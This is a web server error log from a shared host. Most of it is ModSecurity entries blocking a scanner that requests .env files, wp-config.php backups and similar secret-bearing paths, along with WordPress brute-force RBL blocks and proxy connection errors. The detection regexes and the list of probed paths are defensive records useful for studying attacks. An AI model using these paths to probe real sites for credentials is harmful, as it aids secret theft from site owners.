[Tue May 26 13:44:27.741663 2026] [security2:error] [pid 544395:tid 544625] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWYxmrs7g3RMCdp8XeSAAAAGQ"]
[Tue May 26 13:44:29.093509 2026] [security2:error] [pid 544395:tid 544476] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.billing.mosykay.com"] [uri "/.env"] [unique_id "ahVWZRmrs7g3RMCdp8XebAAAL1A"]
[Tue May 26 13:44:29.535383 2026] [security2:error] [pid 544395:tid 544617] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWZRmrs7g3RMCdp8XebgAAAFw"]
[Tue May 26 13:44:30.814519 2026] [security2:error] [pid 544395:tid 544608] [client 129.222.147.134:42019] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWZhmrs7g3RMCdp8XenwAAAFM"]
[Tue May 26 13:44:30.830141 2026] [security2:error] [pid 544395:tid 544608] [client 129.222.147.134:42019] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWZhmrs7g3RMCdp8XenwAAAFM"]
[Tue May 26 13:44:31.457015 2026] [security2:error] [pid 544395:tid 544548] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWZxmrs7g3RMCdp8XeqAAAABc"]
[Tue May 26 13:44:33.389163 2026] [security2:error] [pid 544395:tid 544552] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWaBmrs7g3RMCdp8Xe0AAAABs"]
[Tue May 26 13:44:34.399814 2026] [security2:error] [pid 544395:tid 544483] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.billing.mosykay.com"] [uri "/.env.backup"] [unique_id "ahVWahmrs7g3RMCdp8Xe8QAAF1c"]
[Tue May 26 13:44:34.488479 2026] [security2:error] [pid 536875:tid 537060] [client 106.192.248.115:54670] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWaur_-FTveSGlx1H5-QAAALw"]
[Tue May 26 13:44:34.492645 2026] [security2:error] [pid 536875:tid 537060] [client 106.192.248.115:54670] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWaur_-FTveSGlx1H5-QAAALw"]
[Tue May 26 13:44:34.737250 2026] [security2:error] [pid 544395:tid 544492] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.billing.mosykay.com"] [uri "/.env.old"] [unique_id "ahVWahmrs7g3RMCdp8Xe-AAABmA"]
[Tue May 26 13:44:34.894031 2026] [security2:error] [pid 544395:tid 544475] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.billing.mosykay.com"] [uri "/.env.bak"] [unique_id "ahVWahmrs7g3RMCdp8XfAwAAGk8"]
[Tue May 26 13:44:35.180743 2026] [security2:error] [pid 544395:tid 544495] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.billing.mosykay.com"] [uri "/config/.env"] [unique_id "ahVWaxmrs7g3RMCdp8XfCwAALGM"]
[Tue May 26 13:44:35.229049 2026] [security2:error] [pid 536875:tid 537115] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWaur_-FTveSGlx1H6AgAAAPM"]
[Tue May 26 13:44:35.422818 2026] [security2:error] [pid 544395:tid 544491] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.billing.mosykay.com"] [uri "/app/.env"] [unique_id "ahVWaxmrs7g3RMCdp8XfEgAAT18"]
[Tue May 26 13:44:35.579568 2026] [security2:error] [pid 544395:tid 544477] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.billing.mosykay.com"] [uri "/src/.env"] [unique_id "ahVWaxmrs7g3RMCdp8XfEwAAb1E"]
[Tue May 26 13:44:35.761174 2026] [security2:error] [pid 544395:tid 544463] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.billing.mosykay.com"] [uri "/backend/.env"] [unique_id "ahVWaxmrs7g3RMCdp8XfGAAAbUM"]
[Tue May 26 13:44:35.919782 2026] [security2:error] [pid 544395:tid 544482] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.billing.mosykay.com"] [uri "/api/.env"] [unique_id "ahVWaxmrs7g3RMCdp8XfHAAAKlY"]
[Tue May 26 13:44:36.221800 2026] [security2:error] [pid 544395:tid 544501] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 218.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/config.php"] [unique_id "ahVWbBmrs7g3RMCdp8XfHwAAf2k"]
[Tue May 26 13:44:36.589174 2026] [security2:error] [pid 544395:tid 544505] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 218.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/settings.php"] [unique_id "ahVWbBmrs7g3RMCdp8XfKwAAY20"]
[Tue May 26 13:44:36.875781 2026] [security2:error] [pid 544395:tid 544619] [client 185.191.171.8:38538] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school/page/2/"] [unique_id "ahVWbBmrs7g3RMCdp8XfMgAAAF4"]
[Tue May 26 13:44:36.875893 2026] [security2:error] [pid 544395:tid 544619] [client 185.191.171.8:38538] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school/page/2/"] [unique_id "ahVWbBmrs7g3RMCdp8XfMgAAAF4"]
[Tue May 26 13:44:36.971209 2026] [security2:error] [pid 544395:tid 544396] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 218.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/wp-config.php"] [unique_id "ahVWbBmrs7g3RMCdp8XfNQAAVwA"]
[Tue May 26 13:44:37.327257 2026] [security2:error] [pid 544395:tid 544517] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 218.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/config.php.bak"] [unique_id "ahVWbRmrs7g3RMCdp8XfQwAAI3k"]
[Tue May 26 13:44:37.359853 2026] [security2:error] [pid 544395:tid 544544] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWbBmrs7g3RMCdp8XfNAAAABM"]
[Tue May 26 13:44:37.709318 2026] [security2:error] [pid 544395:tid 544514] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.billing.mosykay.com"] [uri "/wp-config.php.backup"] [unique_id "ahVWbRmrs7g3RMCdp8XfRAAAD3Y"]
[Tue May 26 13:44:37.924735 2026] [security2:error] [pid 544395:tid 544507] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.billing.mosykay.com"] [uri "/wp-config.php.bak"] [unique_id "ahVWbRmrs7g3RMCdp8XfSAAAIG8"]
[Tue May 26 13:44:38.090259 2026] [security2:error] [pid 544395:tid 544518] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.billing.mosykay.com"] [uri "/wp-config.php.old"] [unique_id "ahVWbhmrs7g3RMCdp8XfTgAABXo"]
[Tue May 26 13:44:38.262007 2026] [security2:error] [pid 544395:tid 544513] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.billing.mosykay.com"] [uri "/wp-config.php.save"] [unique_id "ahVWbhmrs7g3RMCdp8XfUgAAfHU"]
[Tue May 26 13:44:38.462433 2026] [security2:error] [pid 544395:tid 544534] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWbhmrs7g3RMCdp8XfSgAAAAk"]
[Tue May 26 13:44:38.654875 2026] [security2:error] [pid 544395:tid 544512] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.billing.mosykay.com"] [uri "/wp-config.php.swp"] [unique_id "ahVWbhmrs7g3RMCdp8XfWAAAMHQ"]
[Tue May 26 13:44:38.900918 2026] [security2:error] [pid 544395:tid 544510] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.billing.mosykay.com"] [uri "/wp-config.php.txt"] [unique_id "ahVWbhmrs7g3RMCdp8XfWgAAG3I"]
[Tue May 26 13:44:40.056102 2026] [security2:error] [pid 544395:tid 544571] [client 14.175.100.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWbxmrs7g3RMCdp8XfZAAAAC4"]
[Tue May 26 13:44:40.483898 2026] [security2:error] [pid 536875:tid 537043] [client 92.71.125.151:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVWb-r_-FTveSGlx1H6MAAAAKs"]
[Tue May 26 13:44:41.087169 2026] [security2:error] [pid 544395:tid 544569] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWcBmrs7g3RMCdp8XffwAAACw"]
[Tue May 26 13:44:41.191291 2026] [security2:error] [pid 544395:tid 544591] [client 129.222.147.134:62899] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWcRmrs7g3RMCdp8XfggAAAEI"]
[Tue May 26 13:44:41.191416 2026] [security2:error] [pid 544395:tid 544591] [client 129.222.147.134:62899] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWcRmrs7g3RMCdp8XfggAAAEI"]
[Tue May 26 13:44:41.259710 2026] [security2:error] [pid 536875:tid 536982] [remote 74.7.241.58:39866] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVWcer_-FTveSGlx1H6RQABAGo"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/vi
[Tue May 26 13:44:41.363795 2026] [proxy:error] [pid 536875:tid 537009] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:41.363854 2026] [proxy_http:error] [pid 536875:tid 537009] [client 208.84.100.173:19796] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:41.364449 2026] [proxy:error] [pid 536875:tid 537009] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:41.364483 2026] [proxy_http:error] [pid 536875:tid 537009] [client 208.84.100.173:19796] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:41.479056 2026] [security2:error] [pid 536875:tid 536927] [remote 167.172.25.98:58714] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.172.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVWcer_-FTveSGlx1H6RgAAqTM"]
[Tue May 26 13:44:42.232607 2026] [security2:error] [pid 536875:tid 537108] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVWcOr_-FTveSGlx1H6NQAAAOw"]
[Tue May 26 13:44:42.771403 2026] [security2:error] [pid 536875:tid 537091] [client 208.84.100.173:36322] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/api/.env"] [unique_id "ahVWcur_-FTveSGlx1H6cwAAANs"]
[Tue May 26 13:44:42.771542 2026] [security2:error] [pid 536875:tid 537095] [client 208.84.100.173:36312] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/app/.env"] [unique_id "ahVWcur_-FTveSGlx1H6dwAAAN8"]
[Tue May 26 13:44:42.772604 2026] [proxy:error] [pid 536875:tid 537026] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.772670 2026] [proxy_http:error] [pid 536875:tid 537026] [client 208.84.100.173:36350] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.773245 2026] [proxy:error] [pid 536875:tid 537026] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.773278 2026] [proxy_http:error] [pid 536875:tid 537026] [client 208.84.100.173:36350] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.773401 2026] [proxy:error] [pid 536875:tid 537119] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.773474 2026] [proxy_http:error] [pid 536875:tid 537119] [client 208.84.100.173:36342] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.774047 2026] [proxy:error] [pid 536875:tid 537085] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.774124 2026] [proxy_http:error] [pid 536875:tid 537085] [client 208.84.100.173:36366] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.774356 2026] [proxy:error] [pid 536875:tid 537078] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.774431 2026] [proxy_http:error] [pid 536875:tid 537078] [client 208.84.100.173:36354] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.774539 2026] [proxy:error] [pid 536875:tid 537016] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.774588 2026] [proxy_http:error] [pid 536875:tid 537016] [client 208.84.100.173:36292] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.774646 2026] [security2:error] [pid 536875:tid 537088] [client 208.84.100.173:36332] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/backend/.env"] [unique_id "ahVWcur_-FTveSGlx1H6dgAAANg"]
[Tue May 26 13:44:42.774686 2026] [proxy:error] [pid 536875:tid 537119] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.774736 2026] [proxy_http:error] [pid 536875:tid 537119] [client 208.84.100.173:36342] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.774943 2026] [proxy:error] [pid 536875:tid 537109] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.774979 2026] [proxy_http:error] [pid 536875:tid 537109] [client 208.84.100.173:36302] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.775116 2026] [proxy:error] [pid 536875:tid 537036] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.775186 2026] [proxy_http:error] [pid 536875:tid 537036] [client 208.84.100.173:36356] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.775427 2026] [proxy:error] [pid 536875:tid 537016] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.775466 2026] [proxy_http:error] [pid 536875:tid 537016] [client 208.84.100.173:36292] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.775580 2026] [proxy:error] [pid 536875:tid 537085] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.775642 2026] [proxy_http:error] [pid 536875:tid 537085] [client 208.84.100.173:36366] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.775735 2026] [proxy:error] [pid 536875:tid 537078] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.775775 2026] [proxy_http:error] [pid 536875:tid 537078] [client 208.84.100.173:36354] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.775876 2026] [proxy:error] [pid 536875:tid 537021] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.775920 2026] [proxy_http:error] [pid 536875:tid 537021] [client 208.84.100.173:36274] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.776113 2026] [proxy:error] [pid 536875:tid 537036] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.776179 2026] [proxy_http:error] [pid 536875:tid 537036] [client 208.84.100.173:36356] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.776257 2026] [proxy:error] [pid 536875:tid 537109] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.776291 2026] [proxy_http:error] [pid 536875:tid 537109] [client 208.84.100.173:36302] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.776522 2026] [proxy:error] [pid 536875:tid 537021] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.776556 2026] [proxy_http:error] [pid 536875:tid 537021] [client 208.84.100.173:36274] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
